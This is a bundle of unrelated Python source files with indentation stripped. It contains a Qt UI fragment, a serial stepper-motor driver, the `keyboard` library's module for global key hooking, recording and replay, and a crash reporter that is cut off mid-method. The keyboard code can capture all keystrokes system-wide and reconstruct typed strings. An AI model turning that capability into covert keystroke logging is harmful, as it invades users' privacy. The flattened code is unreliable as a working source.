if self.radioButtonMX.isChecked():
self.hybridhigh.setEnabled(True)
self.hybridlow.setEnabled(True)
else:
self.hybridhigh.setEnabled(False)
self.hybridlow.setEnabled(False)
|
motorbackend.py
|
from serial import Serial
from threading import Thread, Lock
class DaisyDriver(Serial):
def __init__(self, connected = True):
# check for connection bool to allow for dummy DaisyDriver object
# if not connected
if connected:
# initialise DaisyDriver serial object (hard code serial address for now)
super(DaisyDriver, self).__init__('/dev/ttyACM0')
# set initial speed (0,1,2 for low,medium,high respectively)
self.speedset(2)
# initialise jog lock
self.joglock = Lock()
# initialise direction dictionary, f = forward, fl = forward left etc...
self.directions = {'l':(0, -1, 0),
'r':(0, 1, 0),
'f':(-1, 0, 0),
'fl':(-1, -1, 0),
'fr':(-1, 1, 0),
'b':(1, 0, 0),
'bl':(1, -1, 0),
'br':(1, 1, 0),
'u':(0, 0, -1),
'd':(0, 0, 1)}
elif not connected:
# just set default speedval for slider to read
self.speedval = 2
def speedset(self, val):
# speed val
self.speedval = val
# value from slider equals 0, 1 or 2. Use list for converting
# slider index to step motor speed
speeds = [50, 275, 500]
# serial command
command = 'STV 0 {V} {V} {V} \r'.format(V=speeds[self.speedval])
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
self.write(bytes_command)
# flush buffer
self.flush()
def __jogdo(self, x, y, z):
# enable lock
with self.joglock:
# flush buffer
self.flush()
# serial command
command = 'JOG 0 {x_} {y_} {z_} \r'.format(x_=x, y_=y, z_=z)
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
self.write(bytes_command)
# read finish statement and print
self.readline()
def __jog(self, x, y, z, button_handle):
# count, button status dependent
count = 0
# upper limit on jog repeats
while count < 1000:
if (count == 0):
self.__jogdo(x, y, z)
elif button_handle.isDown():
self.__jogdo(x, y, z)
count+=1
def jog(self, direction, button_handle):
# if not locked then jog
if not self.joglock.locked():
# get direction vector
dir_tuple = self.directions[direction]
# start jog
jogthread = Thread(target=self.__jog, args=(*dir_tuple, button_handle))
jogthread.start()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
keyboard
========
Take full control of your keyboard with this small Python library. Hook global events, register hotkeys, simulate key presses and much more.
## Features
- Global event hook on all keyboards (captures keys regardless of focus).
- **Listen** and **sends** keyboard events.
- Works with **Windows** and **Linux** (requires sudo), with experimental **OS X** support (thanks @glitchassassin!).
- **Pure Python**, no C modules to be compiled.
- **Zero dependencies**. Trivial to install and deploy, just copy the files.
- **Python 2 and 3**.
- Complex hotkey support (e.g. `Ctrl+Shift+M, Ctrl+Space`) with controllable timeout.
- Includes **high level API** (e.g. [record](#keyboard.record) and [play](#keyboard.play), [add_abbreviation](#keyboard.add_abbreviation)).
- Maps keys as they actually are in your layout, with **full internationalization support** (e.g. `Ctrl+ç`).
- Events automatically captured in separate thread, doesn't block main program.
- Tested and documented.
- Doesn't break accented dead keys (I'm looking at you, pyHook).
- Invader support available via project [Invader](https://github.com/boppreh/Invader) (`pip install Invader`).
This program makes no attempt to hide itself, so don't use it for keyloggers.
## Usage
Install the [PyPI package](https://pypi.python.org/pypi/keyboard/):
$ sudo pip install keyboard
or clone the repository (no installation required, source files are sufficient):
$ git clone https://github.com/boppreh/keyboard
Then check the [API docs](https://github.com/boppreh/keyboard#api) to see what features are available.
## Example
```
import keyboard
keyboard.press_and_release('shift+s, space')
keyboard.write('The quick brown fox jumps over the lazy dog.')
# Press PAGE UP then PAGE DOWN to type "foobar".
keyboard.add_hotkey('page up, page down', lambda: keyboard.write('foobar'))
# Blocks until you press esc.
keyboard.wait('esc')
# Record events until 'esc' is pressed.
recorded = keyboard.record(until='esc')
# Then replay back at three times the speed.
keyboard.play(recorded, speed_factor=3)
# Type @@ then press space to replace with abbreviation.
keyboard.add_abbreviation('@@', 'my.long.email@example.com')
# Block forever.
keyboard.wait()
```
## Known limitations:
- Events generated under Windows don't report device id (`event.device == None`). [#21](https://github.com/boppreh/keyboard/issues/21)
- Linux doesn't seem to report media keys. [#20](https://github.com/boppreh/keyboard/issues/20)
- Currently no way to suppress keys ('catch' events and block them). [#22](https://github.com/boppreh/keyboard/issues/22)
- To avoid depending on X the Linux parts reads raw device files (`/dev/input/input*`)
but this requries root.
- Other applications, such as some games, may register hooks that swallow all
key events. In this case `keyboard` will be unable to report events.
"""
import time as _time
from threading import Thread as _Thread
from ._keyboard_event import KeyboardEvent
from ._suppress import KeyTable as _KeyTable
try:
# Python2
long, basestring
is_str = lambda x: isinstance(x, basestring)
is_number = lambda x: isinstance(x, (int, long))
import Queue as queue
except NameError:
# Python3
is_str = lambda x: isinstance(x, str)
is_number = lambda x: isinstance(x, int)
import queue
# Just a dynamic object to store attributes for the closures.
class _State(object): pass
import platform as _platform
if _platform.system() == 'Windows':
from. import _winkeyboard as _os_keyboard
elif _platform.system() == 'Linux':
from. import _nixkeyboard as _os_keyboard
elif _platform.system() == 'Darwin':
from. import _darwinkeyboard as _os_keyboard
else:
raise OSError("Unsupported platform '{}'".format(_platform.system()))
from ._keyboard_event import KEY_DOWN, KEY_UP
from ._keyboard_event import normalize_name as _normalize_name
from ._generic import GenericListener as _GenericListener
all_modifiers = ('alt', 'alt gr', 'ctrl', 'shift', 'win')
_pressed_events = {}
class _KeyboardListener(_GenericListener):
def init(self):
_os_keyboard.init()
def pre_process_event(self, event):
if not event.scan_code and event.name == 'unknown':
return False
# Useful for media keys, which are reported with scan_code = 0.
if not event.scan_code:
event.scan_code = to_scan_code(event.name)
if event.event_type == KEY_UP:
if event.scan_code in _pressed_events:
del _pressed_events[event.scan_code]
else:
_pressed_events[event.scan_code] = event
if not _pressed_events:
_key_table.complete_sequence()
return True
def listen(self):
_os_keyboard.listen(self.queue, _key_table.is_allowed)
_listener = _KeyboardListener()
def matches(event, name):
"""
Returns True if the given event represents the same key as the one given in
`name`.
"""
if is_number(name):
return event.scan_code == name
normalized = _normalize_name(name)
matched_name = (
normalized == event.name
or 'left ' + normalized == event.name
or 'right ' + normalized == event.name
)
return matched_name or _os_keyboard.map_char(normalized)[0] == event.scan_code
def is_pressed(key):
"""
Returns True if the key is pressed.
is_pressed(57) -> True
is_pressed('space') -> True
is_pressed('ctrl+space') -> True
"""
_listener.start_if_necessary()
if is_number(key):
return key in _pressed_events
elif len(key) > 1 and ('+' in key or ',' in key):
parts = canonicalize(key)
if len(parts) > 1:
raise ValueError('Cannot check status of multi-step combination ({}).'.format(key))
return all(is_pressed(part) for part in parts[0])
else:
for event in _pressed_events.values():
if matches(event, key):
return True
return False
def canonicalize(hotkey):
"""
Splits a user provided hotkey into a list of steps, each one made of a list
of scan codes or names. Used to normalize input at the API boundary. When a
combo is given (e.g. 'ctrl + a, b') spaces are ignored.
canonicalize(57) -> [[57]]
canonicalize([[57]]) -> [[57]]
canonicalize('space') -> [['space']]
canonicalize('ctrl+space') -> [['ctrl', 'space']]
canonicalize('ctrl+space, space') -> [['ctrl', 'space'], ['space']]
Note we must not convert names into scan codes because a name may represent
more than one physical key (e.g. two 'ctrl' keys).
"""
if isinstance(hotkey, list) and all(isinstance(step, list) for step in hotkey):
# Already canonicalized, nothing to do.
return hotkey
elif is_number(hotkey):
return [[hotkey]]
if not is_str(hotkey):
raise ValueError('Unexpected hotkey: {}. Expected int scan code, str key combination or normalized hotkey.'.format(hotkey))
if len(hotkey) == 1 or ('+' not in hotkey and ',' not in hotkey):
return [[_normalize_name(hotkey)]]
else:
steps = []
for str_step in hotkey.split(','):
steps.append([])
for part in str_step.split('+'):
steps[-1].append(_normalize_name(part.strip()))
return steps
def call_later(fn, args=(), delay=0.001):
"""
Calls the provided function in a new thread after waiting some time.
Useful for giving the system some time to process an event, without blocking
the current execution flow.
"""
_Thread(target=lambda: _time.sleep(delay) or fn(*args)).start()
def _suppress_hotkey(steps, timeout):
"""
Adds a hotkey to the list of keys to be suppressed.
To unsuppress all hotkeys use `clear_all_hotkeys()`.
"""
_key_table.suppress_sequence(steps, timeout)
_hotkeys = {}
_hotkeys_suppressed = {}
def clear_all_hotkeys():
"""
Removes all hotkey handlers. Note some functions such as 'wait' and 'record'
internally use hotkeys and will be affected by this call.
Abbreviations and word listeners are not hotkeys and therefore not affected.
To remove all hooks use `unhook_all()`.
"""
for handler in _hotkeys.values():
unhook(handler)
_hotkeys.clear()
_key_table.suppress_none()
_hotkeys_suppressed.clear()
# Alias.
remove_all_hotkeys = clear_all_hotkeys
def add_hotkey(hotkey, callback, args=(), suppress=False, timeout=1, trigger_on_release=False):
"""
Invokes a callback every time a key combination is pressed. The hotkey must
be in the format "ctrl+shift+a, s". This would trigger when the user holds
ctrl, shift and "a" at once, releases, and then presses "s". To represent
literal commas, pluses and spaces use their names ('comma', 'plus',
'space').
- `args` is an optional list of arguments to passed to the callback during
each invocation.
- `suppress` defines if the it should block processing other hotkeys after
a match is found. Currently Windows-only.
- `timeout` is the amount of seconds allowed to pass between key presses.
- `trigger_on_release` if true, the callback is invoked on key release instead
of key press.
The event handler function is returned. To remove a hotkey call
`remove_hotkey(hotkey)` or `remove_hotkey(handler)`.
before the combination state is reset.
Note: hotkeys are activated when the last key is *pressed*, not released.
Note: the callback is executed in a separate thread, asynchronously. For an
example of how to use a callback synchronously, see `wait`.
add_hotkey(57, print, args=['space was pressed'])
add_hotkey(' ', print, args=['space was pressed'])
add_hotkey('space', print, args=['space was pressed'])
add_hotkey('Space', print, args=['space was pressed'])
add_hotkey('ctrl+q', quit)
add_hotkey('ctrl+alt+enter, space', some_callback)
"""
steps = canonicalize(hotkey)
state = _State()
state.step = 0
state.time = _time.time()
def handler(event):
if event.event_type == KEY_UP:
if trigger_on_release and state.step == len(steps):
state.step = 0
callback(*args)
return suppress
return
# Just waiting for the user to release a key.
if trigger_on_release and state.step >= len(steps):
return
timed_out = state.step > 0 and timeout and event.time - state.time > timeout
unexpected = not any(matches(event, part) for part in steps[state.step])
if unexpected or timed_out:
if state.step > 0:
state.step = 0
# Could be start of hotkey again.
handler(event)
else:
state.step = 0
else:
state.time = event.time
if _step_is_pressed(steps[state.step]) or all(matches(event, part) for part in steps[state.step]):
state.step += 1
if not trigger_on_release and state.step == len(steps):
state.step = 0
callback(*args)
return suppress
_hotkeys[hotkey] = handler
if suppress:
_suppress_hotkey(steps, timeout)
_hotkeys_suppressed[hotkey] = timeout
return hook(handler)
# Alias.
register_hotkey = add_hotkey
def _step_is_pressed(step):
"""
Returns True if:
- all keys within the step are currently pressed
- no undefined modifiers are currently pressed
"""
inactive_modifiers = [x for x in all_modifiers if not x in step and x in all_modifiers]
return all(is_pressed(x) for x in step) and not any(is_pressed(x) for x in inactive_modifiers)
def hook(callback):
"""
Installs a global listener on all available keyboards, invoking `callback`
each time a key is pressed or released.
The event passed to the callback is of type `keyboard.KeyboardEvent`,
with the following attributes:
- `name`: an Unicode representation of the character (e.g. "&") or
description (e.g. "space"). The name is always lower-case.
- `scan_code`: number representing the physical key, e.g. 55.
- `time`: timestamp of the time the event occurred, with as much precision
as given by the OS.
Returns the given callback for easier development.
"""
_listener.add_handler(callback)
return callback
def unhook(callback):
""" Removes a previously hooked callback. """
_listener.remove_handler(callback)
def unhook_all():
"""
Removes all keyboard hooks in use, including hotkeys, abbreviations, word
listeners, `record`ers and `wait`s.
"""
_hotkeys.clear()
_word_listeners.clear()
del _listener.handlers[:]
def hook_key(key, keydown_callback=lambda: None, keyup_callback=lambda: None):
"""
Hooks key up and key down events for a single key. Returns the event handler
created. To remove a hooked key use `unhook_key(key)` or
`unhook_key(handler)`.
Note: this function shares state with hotkeys, so `clear_all_hotkeys`
affects it aswell.
"""
def handler(event):
if not matches(event, key):
return
if event.event_type == KEY_DOWN:
keydown_callback()
if event.event_type == KEY_UP:
keyup_callback()
_hotkeys[key] = handler
return hook(handler)
def on_press(callback):
"""
Invokes `callback` for every KEY_DOWN event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_DOWN and callback(e))
def on_release(callback):
"""
Invokes `callback` for every KEY_UP event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_UP and callback(e))
def _remove_named_hook(name_or_handler, names):
"""
Removes a hook that was registered with a given name in a dictionary.
"""
if callable(name_or_handler):
handler = name_or_handler
try:
name = next(n for n, h in names.items() if h == handler)
except StopIteration:
raise ValueError('This handler is not associated with any name.')
unhook(handler)
del names[name]
else:
name = name_or_handler
try:
handler = names[name]
except KeyError as e:
raise ValueError('No such named listener: ' + repr(name), e)
unhook(names[name])
del names[name]
return name
def remove_hotkey(hotkey_or_handler):
"""
Removes a previously registered hotkey. Accepts either the hotkey used
during registration (exact string) or the event handler returned by the
`add_hotkey` or `hook_key` functions.
"""
name = _remove_named_hook(hotkey_or_handler, _hotkeys)
if name in _hotkeys_suppressed:
del _hotkeys_suppressed[name]
# because the table structure is optimized for runtime, we must recompile
_key_table.suppress_none()
for current_name in _hotkeys_suppressed:
_suppress_hotkey(canonicalize(current_name), _hotkeys_suppressed[current_name])
# Alias.
unhook_key = remove_hotkey
_word_listeners = {}
def add_word_listener(word, callback, triggers=['space'], match_suffix=False, timeout=2):
"""
Invokes a callback every time a sequence of characters is typed (e.g. 'pet')
and followed by a trigger key (e.g. space). Modifiers (e.g. alt, ctrl,
shift) are ignored.
- `word` the typed text to be matched. E.g. 'pet'.
- `callback` is an argument-less function to be invoked each time the word
is typed.
- `triggers` is the list of keys that will cause a match to be checked. If
the user presses some key that is not a character (len>1) and not in
triggers, the characters so far will be discarded. By default only space
bar triggers match checks.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
Returns the event handler created. To remove a word listener use
`remove_word_listener(word)` or `remove_word_listener(handler)`.
Note: all actions are performed on key down. Key up events are ignored.
Note: word mathes are **case sensitive**.
"""
if word in _word_listeners:
raise ValueError('Already listening for word {}'.format(repr(word)))
state = _State()
state.current = ''
state.time = _time.time()
def handler(event):
name = event.name
if event.event_type == KEY_UP or name in all_modifiers: return
matched = state.current == word or (match_suffix and state.current.endswith(word))
if name in triggers and matched:
callback()
state.current = ''
elif len(name) > 1:
state.current = ''
else:
if timeout and event.time - state.time > timeout:
state.current = ''
state.time = event.time
state.current += name if not is_pressed('shift') else name.upper()
_word_listeners[word] = hook(handler)
return handler
def remove_word_listener(word_or_handler):
"""
Removes a previously registered word listener. Accepts either the word used
during registration (exact string) or the event handler returned by the
`add_word_listener` or `add_abbreviation` functions.
"""
_remove_named_hook(word_or_handler, _word_listeners)
def add_abbreviation(source_text, replacement_text, match_suffix=False, timeout=2):
"""
Registers a hotkey that replaces one typed text with another. For example
add_abbreviation('tm', u'™')
Replaces every "tm" followed by a space with a ™ symbol (and no space). The
replacement is done by sending backspace events.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
For more details see `add_word_listener`.
"""
replacement = '\b'*(len(source_text)+1) + replacement_text
callback = lambda: write(replacement, restore_state_after=False)
return add_word_listener(source_text, callback, match_suffix=match_suffix, timeout=timeout)
# Aliases.
register_word_listener = add_word_listener
register_abbreviation = add_abbreviation
remove_abbreviation = remove_word_listener
def stash_state():
"""
Builds a list of all currently pressed scan codes, releases them and returns
the list. Pairs well with `restore_state`.
"""
state = sorted(_pressed_events)
for scan_code in state:
_os_keyboard.release(scan_code)
return state
def restore_state(scan_codes):
"""
Given a list of scan_codes ensures these keys, and only these keys, are
pressed. Pairs well with `stash_state`.
"""
current = set(_pressed_events)
target = set(scan_codes)
for scan_code in current - target:
_os_keyboard.release(scan_code)
for scan_code in target - current:
_os_keyboard.press(scan_code)
def write(text, delay=0, restore_state_after=True, exact=False):
"""
Sends artificial keyboard events to the OS, simulating the typing of a given
text. Characters not available on the keyboard are typed as explicit unicode
characters using OS-specific functionality, such as alt+codepoint.
To ensure text integrity all currently pressed keys are released before
the text is typed.
- `delay` is the number of seconds to wait between keypresses, defaults to
no delay.
- `restore_state_after` can be used to restore the state of pressed keys
after the text is typed, i.e. presses the keys that were released at the
beginning. Defaults to True.
- `exact` forces typing all characters as explicit unicode (e.g. alt+codepoint)
"""
state = stash_state()
if exact:
for letter in text:
_os_keyboard.type_unicode(letter)
if delay: _time.sleep(delay)
else:
for letter in text:
try:
if letter in '\n\b\t ':
letter = _normalize_name(letter)
scan_code, modifiers = _os_keyboard.map_char(letter)
if is_pressed(scan_code):
release(scan_code)
for modifier in modifiers:
press(modifier)
_os_keyboard.press(scan_code)
_os_keyboard.release(scan_code)
for modifier in modifiers:
release(modifier)
except ValueError:
_os_keyboard.type_unicode(letter)
if delay:
_time.sleep(delay)
if restore_state_after:
restore_state(state)
def to_scan_code(key):
"""
Returns the scan code for a given key name (or scan code, i.e. do nothing).
Note that a name may belong to more than one physical key, in which case
one of the scan codes will be chosen.
"""
if is_number(key):
return key
else:
scan_code, modifiers = _os_keyboard.map_char(_normalize_name(key))
return scan_code
def send(combination, do_press=True, do_release=True):
"""
Sends OS events that perform the given hotkey combination.
- `combination` can be either a scan code (e.g. 57 for space), single key
(e.g. 'space') or multi-key, multi-step combination (e.g. 'alt+F4, enter').
- `do_press` if true then press events are sent. Defaults to True.
- `do_release` if true then release events are sent. Defaults to True.
send(57)
send('ctrl+alt+del')
send('alt+F4, enter')
send('shift+s')
Note: keys are released in the opposite order they were pressed.
"""
for keys in canonicalize(combination):
if do_press:
for key in keys:
_os_keyboard.press(to_scan_code(key))
if do_release:
for key in reversed(keys):
_os_keyboard.release(to_scan_code(key))
def press(combination):
""" Presses and holds down a key combination (see `send`). """
send(combination, True, False)
def release(combination):
""" Releases a key combination (see `send`). """
send(combination, False, True)
def press_and_release(combination):
""" Presses and releases the key combination (see `send`). """
send(combination, True, True)
def _make_wait_and_unlock():
"""
Method to work around CPython's inability to interrupt Lock.join with
signals. Without this Ctrl+C doesn't close the program.
"""
q = queue.Queue(maxsize=1)
def wait():
while True:
try:
return q.get(timeout=1)
except queue.Empty:
pass
return (wait, lambda v=None: q.put(v))
def wait(combination=None):
"""
Blocks the program execution until the given key combination is pressed or,
if given no parameters, blocks forever.
"""
wait, unlock = _make_wait_and_unlock()
if combination is not None:
hotkey_handler = add_hotkey(combination, unlock)
wait()
remove_hotkey(hotkey_handler)
def read_key(filter=lambda e: True):
"""
Blocks until a keyboard event happens, then returns that event.
"""
wait, unlock = _make_wait_and_unlock()
def test(event):
if filter(event):
unhook(test)
unlock(event)
hook(test)
return wait()
def record(until='escape'):
"""
Records all keyboard events from all keyboards until the user presses the
given key combination. Then returns the list of events recorded, of type
`keyboard.KeyboardEvent`. Pairs well with
`play(events)`.
Note: this is a blocking function.
Note: for more details on the keyboard hook and events see `hook`.
"""
recorded = []
hook(recorded.append)
wait(until)
unhook(recorded.append)
return recorded
def play(events, speed_factor=1.0):
"""
Plays a sequence of recorded events, maintaining the relative time
intervals. If speed_factor is <= 0 then the actions are replayed as fast
as the OS allows. Pairs well with `record()`.
Note: the current keyboard state is cleared at the beginning and restored at
the end of the function.
"""
state = stash_state()
last_time = None
for event in events:
if speed_factor > 0 and last_time is not None:
_time.sleep((event.time - last_time) / speed_factor)
last_time = event.time
key = event.scan_code or event.name
if event.event_type == KEY_DOWN:
press(key)
elif event.event_type == KEY_UP:
release(key)
# Ignore other types of events.
restore_state(state)
replay = play
_shifted_mapping= {'1': '!', '2': '@', '3': '#', '4': '$', '5': '%', '6': '¨',
'7': '&', '8': '*', '9': '(', '0': ')', '-': '_', '=': '+', '\'': '"',
'[': '{', ']': '}', '´': '`', '~': '^', '\\': '|', ',': '<', '.': '>',
';': ':', '/': '?'}
def _get_shifted_character(character):
"""
It performs the mapping of special characters, for the correct operation
of the "get_typed_strings" function, when the [shift] is pressed.
"""
return _shifted_mapping.get(character, character.upper())
def get_typed_strings(events, allow_backspace=True):
"""
Given a sequence of events, tries to deduce what strings were typed.
Strings are separated when a non-textual key is pressed (such as tab or
enter). Characters are converted to uppercase according to shift and
capslock status. If `allow_backspace` is True, backspaces remove the last
character typed.
This function is a generator, so you can pass an infinite stream of events
and convert them to strings in real time.
Note this functions is merely an heuristic. Windows for example keeps per-
process keyboard state such as keyboard layout, and this information is not
available for our hooks.
get_type_strings(record()) -> ['This is what', 'I recorded', '']
"""
shift_pressed = False
capslock_pressed = False
string = ''
for event in events:
name = event.name
# Space is the only key that we canonicalize to the spelled out name
# because of legibility. Now we have to undo that.
if matches(event, 'space'):
name = ' '
if matches(event, 'shift'):
shift_pressed = event.event_type == 'down'
elif matches(event, 'caps lock') and event.event_type == 'down':
capslock_pressed = not capslock_pressed
elif allow_backspace and matches(event, 'backspace') and event.event_type == 'down':
string = string[:-1]
elif event.event_type == 'down':
if len(name) == 1:
if shift_pressed:
name = _get_shifted_character(name)
elif capslock_pressed:
name = name.upper()
string = string + name
else:
yield string
string = ''
yield string
_key_table = _KeyTable(press, release)
recording = None
def start_recording(recorded_events_queue=None):
"""
Starts recording all keyboard events into a global variable, or the given
queue if any. Returns the queue of events and the hooked function.
Use `stop_recording()` or `unhook(hooked_function)` to stop.
"""
global recording
recorded_events_queue = recorded_events_queue or queue.Queue()
recording = recorded_events_queue, hook(recorded_events_queue.put)
return recording
def stop_recording():
"""
Stops the global recording of events and returns a list of the events
captured.
"""
global recording
if not recording:
raise ValueError('Must call "start_recording" before.')
recorded_events_queue, hooked = recording
unhook(hooked)
recording = None
return list(recorded_events_queue.queue)
def get_shortcut_name(names=None):
"""
Returns a string representation of shortcut from the given key names, or
the currently pressed keys if not given. This function:
- normalizes names;
- removes "left" and "right" prefixes;
- replaces the "+" key name with "plus" to avoid ambiguity;
- puts modifier keys first, in a standardized order;
- sort remaining keys;
- finally, joins everything with "+".
Example:
get_shortcut_name(['+', 'left ctrl', 'shift'])
# "ctrl+shift+plus"
"""
if names is None:
_listener.start_if_necessary()
names = [e.name for e in _pressed_events.values()]
else:
names = [_normalize_name(name) for name in names]
clean_names = set(e.replace('left ', '').replace('right ', '').replace('+', 'plus') for e in names)
# https://developer.apple.com/macos/human-interface-guidelines/input-and-output/keyboard/
# > List modifier keys in the correct order. If you use more than one modifier key in a
# > shortcut, always list them in this order: Control, Option, Shift, Command.
modifiers = ['ctrl', 'alt', 'shift', 'windows']
sorting_key = lambda k: (modifiers.index(k) if k in modifiers else 5, str(k))
return '+'.join(sorted(clean_names, key=sorting_key))
def read_shortcut():
"""
Similar to `read_key()`, but blocks until the user presses and releases a key
combination (or single key), then returns a string representing the shortcut
pressed.
Example:
read_shortcut()
# "ctrl+shift+p"
"""
wait, unlock = _make_wait_and_unlock()
def test(event):
if event.event_type == KEY_UP:
unhook(test)
names = [e.name for e in _pressed_events.values()] + [event.name]
unlock(get_shortcut_name(names))
hook(test)
return wait()
read_hotkey = read_shortcut
def remap(src, dst):
"""
Whenever the key combination `src` is pressed, suppress it and press
`dst` instead.
Example:
remap('alt+w', 'up')
remap('capslock', 'esc')
"""
def handler():
state = stash_state()
press_and_release(dst)
restore_state(state)
return add_hotkey(src, handler, suppress=True)
|
crashreporter.py
|
__author__ = 'calvin'
import ConfigParser
import datetime
import glob
import json
import logging
import os
import re
import shutil
import smtplib
import sys
import time
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from threading import Thread
import jinja2
from api import upload_report, upload_many_reports, HQ_DEFAULT_TIMEOUT, SMTP_DEFAULT_TIMEOUT
from process import CrashReportingProcess
from tools import analyze_traceback, repr as safe_repr
class CrashReporter(object):
"""
Create a context manager that emails or uploads a report to a webserver (HQ) with the traceback on a crash.
It can be setup to do both, or just one of the upload methods.
If a crash report fails to upload, the report is saved locally to the `report_dir` directory. The next time the
CrashReporter starts up, it will attempt to upload all offline reports every `check_interval` seconds. After a
successful upload the offline reports are deleted. A maximum of `offline_report_limit` reports are saved at any
time. Reports are named crashreport01, crashreport02, crashreport03 and so on. The most recent report is always
crashreport01.
Report Customizing Attributes:
application_name: Application name as a string to be included in the report
application_version: Application version as a string to be included in the report
user_identifier: User identifier as a string to add to the report
offline_report_limit: Maximum number of offline reports to save.
recursion_depth_limit: Maximum number of tracebacks to record in the case of RunetimeError: maximum recursion depth
exceeded
max_string_length: Maximum string length for values returned in variable inspection. This prevents reports which
contain array data from becoming too large.
inspection_level: The number of traceback objects (from most recent) to inspect for source code, local variables etc
:param report_dir: Directory to save offline reports.
:param watcher: Enable a thread that periodically checks for any stored offline reports and attempts to send them.
:param check_interval: How often the watcher will attempt to send offline reports.
:param logger: Optional logger to use.
:param config: Path to configuration file that defines the arguments to setup_smtp and setup_hq. The file has the
format of a ConfigParser file with sections [SMTP] and [HQ]
"""
_report_name = "crash_report_%d"
html_template = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'email_report.html')
active = False
application_name = None
application_version = None
user_identifier = None
offline_report_limit = 10
recursion_depth_limit = 10
send_at_most = 3 # max number of offline reports to send in batch
max_string_length = 1000
obj_ref_regex = re.compile("[A-z]+[0-9]*\.(?:[A-z]+[0-9]*\.?)+(?!\')")
def __init__(self, report_dir=None, config='', logger=None, activate=True,
watcher=True, check_interval=5*60):
self.logger = logger if logger else logging.getLogger('CrashReporter')
# Setup the directory used to store offline crash reports
self.report_dir = report_dir
self.check_interval = check_interval
self.watcher_enabled = watcher
self._watcher = None
self._watcher_running = False
self.etype = None
self.evalue = None
self.tb = None
self._recursion_error = False
self.analyzed_traceback = None
self.payload = None
self._excepthook = None
self.inspection_level = 1
self._smtp = None
self._hq = None
# Load the configuration from a file if specified
if os.path.isfile(config):
self.load_configuration(config)
if activate:
self.enable()
def setup_smtp(self, host, port, user, passwd, recipients, **kwargs):
"""
Set up the crash reporter to send reports via email using SMTP
:param host: SMTP host
:param port: SMTP port
:param user: sender email address
:param passwd: sender email password
:param recipients: list or comma separated string of recipients
"""
self._smtp = kwargs
self._smtp.update({'host': host, 'port': port, 'user': user, 'passwd': passwd, 'recipients': recipients})
try:
self._smtp['timeout'] = int(kwargs.get('timeout', SMTP_DEFAULT_TIMEOUT))
except Exception as e:
logging.error(e)
self._smtp['timeout'] = None
self._smtp['from'] = kwargs.get('from', user)
def setup_hq(self, server, **kwargs):
self._hq = kwargs
try:
self._hq['timeout'] = int(kwargs.get('timeout', HQ_DEFAULT_TIMEOUT))
except Exception as e:
logging.error(e)
self._hq['timeout'] = None
self._hq.update({'server': server})
def enable(self):
"""
Enable the crash reporter. CrashReporter is defaulted to be enabled on creation.
"""
if not CrashReporter.active:
CrashReporter.active = True
# Store this function so we can set it back if the CrashReporter is deactivated
self._excepthook = sys.excepthook
sys.excepthook = self.exception_handler
self.logger.info('CrashReporter: Enabled')
if self.report_dir:
if os.path.exists(self.report_dir):
if self.get_offline_reports():
# First attempt to send the reports, if that fails then start the watcher
self.submit_offline_reports()
remaining_reports = len(self.get_offline_reports())
if remaining_reports and self.watcher_enabled:
self.start_watcher()
else:
os.makedirs(self.report_dir)
def disable(self):
"""
Disable the crash reporter. No reports will be sent or saved.
"""
if CrashReporter.active:
CrashReporter.active = False
# Restore the original excepthook
sys.excepthook = self._excepthook
self.stop_watcher()
self.logger.info('CrashReporter: Disabled')
def start_watcher(self):
"""
Start the watcher that periodically checks for offline reports and attempts to upload them.
"""
if self._watcher and self._watcher.is_alive:
self._watcher_running = True
else:
self.logger.info('CrashReporter: Starting watcher.')
self._watcher = Thread(target=self._watcher_thread, name='offline_reporter')
self._watcher.setDaemon(True)
self._watcher_running = True
self._watcher.start()
def stop_watcher(self):
"""
Stop the watcher thread that tries to send offline reports.
"""
if self._watcher:
self._watcher_running = False
self.logger.info('CrashReporter: Stopping watcher.')
def interprocess_exception_handler(self, err_name, err_msg, analyzed_tb):
payload = self.generate_payload(err_name, err_msg, analyzed_tb)
self.handle_payload(payload)
def _analyze_traceback(self, traceback):
# To prevent recording a large amount of potentially redundant tracebacks, limit the trace back for the case of
# infinite recursion errors.
limit = CrashReporter.recursion_depth_limit if self._recursion_error else None
analyzed_tb = analyze_traceback(traceback, limit=limit)
self.custom_inspection(analyzed_tb)
# Perform serialization check on the possibly user-altered traceback
overriden = self.__class__.custom_inspection.im_func is not CrashReporter.custom_inspection.im_func
if overriden:
for tb in analyzed_tb:
for key, value in tb['Custom Inspection'].iteritems():
try:
json.dumps(value)
except TypeError:
tb['Custom Inspection'][key] = {k: safe_repr(v) for k, v in value.iteritems()}
return analyzed_tb
def custom_inspection(self, analyzed_traceback):
"""
Define this function so that users can override it and add their own custom information to
the payload in the 'Custom Inspection' key.
"""
return analyzed_traceback
def exception_handler(self, etype, evalue, tb):
"""
Exception hook. Catches crashes / un-caught exceptions and passes them to handle_payload()
:param etype: Exception type
:param evalue: Exception value
:param tb: Traceback
:return:
"""
self.etype = etype
self.evalue = evalue
self.tb = tb
self._recursion_error = "maximum recursion depth exceeded" in str(self.evalue)
if etype:
self.logger.info('CrashReporter: Crashes detected!')
self.analyzed_traceback = self._analyze_traceback(tb)
self.handle_payload(self.generate_payload(etype.__name__, '%s' % evalue, self.analyzed_traceback))
else:
self.logger.info('CrashReporter: No crashes detected.')
self.forward_exception(etype, evalue, tb)
def forward_exception(self, etype, evalue, tb):
"""
Forward the exception onto the backup copy that was made of the sys.__excepthook__
:param etype: Exceoption type
:param evalue: Exception value
:param tb: Traceback
:return:
"""
self._excepthook(etype, evalue, tb)
def handle_payload(self, payload):
"""
Given a crash report (JSON represented payload), attempts to upload the crash reports. Calls the default
exception handler (sys.__except_hook__) upon completion.
:param payload: JSON structure containing crash report along with metadata
:return:
"""
self.payload = payload
if CrashReporter.active:
# Attempt to upload the report
